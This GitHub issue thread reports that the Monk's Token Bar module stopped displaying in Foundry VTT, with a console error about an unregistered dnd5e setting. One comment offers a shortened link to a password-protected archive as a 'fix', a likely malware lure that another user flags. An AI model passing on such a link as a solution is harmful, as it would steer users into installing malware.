### ISSUE TITLE
[BUG] Brief description of your issue

### ISSUE THREAD

**Issue by thanosazlin24** [ironmonk88/monks-tokenbar#528] opened 2024-10-21 15:49 UTC
**Describe the bug**
suddenly today i noticed that i could only see my PCs portrait pics in the token bar.  it was missing the 6 buttons to the left like combat, preventing movement, etc..  so i removed Monk Token Bar from my world, same issue. so then i uninstalled the module completely and reinstalled it, then added back to my world, now the Token Bar just doesn't show up at all. here is link to reddit post with images. 
https://www.reddit.com/r/FoundryVTT/comments/1g8q380/monks_token_bar_has_disappeared_suddenly_foundry/

**To Reproduce**
Not sure how to repro it just disappeared now.

**Expected behavior**
The Token Bar should be displaying

**Screenshots**
see reddit post https://www.reddit.com/r/FoundryVTT/comments/1g8q380/monks_token_bar_has_disappeared_suddenly_foundry/

**Please complete as much of the following information as possible:**
 - Browser Edge latest version of of Oct 21st 2024
 - Foundry Version v12 latest version as of Oct 21st 2024 v12 build 133
 - System DnD 4.0.4
 - Module version 12.0.2

 - Are there any errors in the console [e.g. press F12 and look for red text]
foundry.js:655 Error: Error thrown in hooked function 'ready' for hook 'ready'. "dnd5e.disableExperienceTracking" is not a registered game setting
[Detected 1 package: monks-tokenbar(12.02)]
    at Hooks.onError (foundry.js:654:24)
    at 🎁Hooks.onError#0 (libWrapper-wrapper.js:188:54)
    at #call (foundry.js:636:36)
    at Hooks.callAll (foundry.js:589:17)
    at Game.setupGame (foundry.js:9098:11)
    at async Game._initializeGameView (foundry.js:10432:5)
    at async Game.initialize (foundry.js:8995:5)

 - Have you tried using `Find the Culprit` to make sure it isn't a module interaction. No

**Additional context**

**Comment by DaavMendonca** [comment] 2024-10-21 15:49
try this
https://bit.ly/4feHJZF
Archive codepass: xfp53

you may need to install the c compiler

**Comment by thanosazlin24** [comment] 2024-10-21 15:54
where should i put them ? in reference to Foundry VTT files ?

**Comment by DerJJ** [comment] 2024-10-21 16:59
> try this https://bit.ly/4feHJZF Archive codepass: xfp53
> 
> you may need to install the c compiler

DO NOT OPEN THIS!
Looks like a hacked account which tries to spread a virus. Highly dubious, there isnt any C compiler involved here.

**Comment by ironmonk88** [comment] 2024-10-23 20:52
closing duplicate of #522

**Closed by ironmonk88** 2024-10-23 20:52 UTC
Labels: duplicate
